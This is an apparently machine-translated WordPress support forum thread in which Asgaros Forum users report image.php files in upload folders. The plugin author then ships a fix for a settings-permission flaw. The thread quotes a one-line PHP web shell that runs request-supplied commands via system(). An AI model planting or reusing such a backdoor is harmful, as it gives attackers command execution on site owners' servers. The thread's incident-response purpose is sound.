Un usuario preguntó 👇
Hola. Estoy usando foros de Asgaros. Y hoy, VaultPress (plugin principal de seguridad y respaldo de WordPress) me dio una amenaza de seguridad en el siguiente sitio:
uploads / asgarosforum / 19 / image.php upload / asgarosforum / 20 / image.php upload / asgarosforum / 21 / image.php
Hay un archivo llamado image.php que tiene un código sospechoso:
if (isset ($ _ REQUEST)[‘cmd’])) {@system ($ _ REQUEST[‘cmd’]); }
Revíselo y avíseme si es seguro y de Asgaros.
Este tema fue modificado hace 3 años, 4 meses por. Este tema fue modificado hace 3 años, 4 meses por. Este tema fue modificado hace 3 años, 4 meses por.
(@yworld)
Hace 3 años, 4 meses
Hola @ sarangsss29 Elimina los archivos (image.php) y cierra temporalmente los archivos adjuntos. Win.Trojan… Compruebe si hay archivos de servidor sospechosos
Esta respuesta fue modificada hace 3 años, 4 meses por. Esta respuesta fue modificada hace 3 años, 4 meses por.
(@drahtigel)
Hace 3 años, 4 meses
Ayer fue el mismo problema. Además de escribir el archivo especificado (que fue eliminado por el servidor antivirus), el foro de configuración voló para permitir todo, y la máscara retrocedió por defecto. La impresión de que los arreglos simplemente se sobrescribieron. En el foro del tema con ID 1 había un puñado de aquellos con el nombre Prueba y la Prueba de mensaje con archivo adjunto image.php.
Sin embargo, en otras partes del sitio, no se observó actividad sospechosa.
(@yworld)
Hace 3 años, 4 meses
@drahtigel
La impresión de que los arreglos simplemente se sobrescribieron.
La configuración cambia a través de la base de datos
(@drahtigel)
Hace 3 años, 4 meses
La configuración cambia a través de la base de datos
¿Hay otra forma de cambiar la configuración, como ejecutar cualquier script a través de una vulnerabilidad en WP o foro? Es por eso que el acceso a la base de datos está cerrado desde el exterior. Solo para trabajar con bases de datos, debe ubicarlas en el servidor para conocer el prefijo, conocer la contraseña de la base de datos.
(@ sarangsss29)
Hace 3 años, 4 meses
@yworld Gracias por la sugerencia. Los archivos se han eliminado. Ojalá no vuelvan a ocurrir. No estoy seguro de si se trata de una inyección de código de terceros o si sucedió por defecto en Asgaros. Si es un troyano, ¿cómo entró en él?
Después de eliminar los archivos, el foro recibió la configuración predeterminada mencionada por @drahtigel
Gracias por toda la ayuda. ¿Qué debería hacer después?
(@yworld)
Hace 3 años, 4 meses
Carcasa y puerta trasera subidos @drahtigel
(@yworld)
Hace 3 años, 4 meses
@ sarangsss29
¿Qué debería hacer después?
Espere a que se resuelva el problema. Si es de Asgaros. No está claro qué plugin o WP
Esta respuesta fue modificada hace 3 años, 4 meses por.
(@asgaros)
Hace 3 años, 4 meses
Hola,
gracias por esta información. Intentaré averiguar qué está pasando.
(@asgaros)
Hace 3 años, 4 meses
@ sarangsss29 @drahtigel @yworld
Acabo de publicar la versión 1.5.8, que debería corregir el error de que los usuarios no administrativos pueden modificar la configuración del foro. Este error puede haber permitido a un atacante modificar la configuración para poder cargar archivos PHP.
Instale la última versión y envíeme sus comentarios si esos problemas desaparecieron. ¡Lo siento por los inconvenientes ocasionados! 🙁
(@yworld)
Hace 3 años, 4 meses
@asgaros ¡Gracias!
(@drahtigel)
Hace 3 años, 4 meses
@asgaros ty
(@ sarangsss29)
Hace 3 años, 4 meses
Si. Creo que el problema se ha ido. Gracias @asgaros
¿Solucionó tu problema??
0 / 0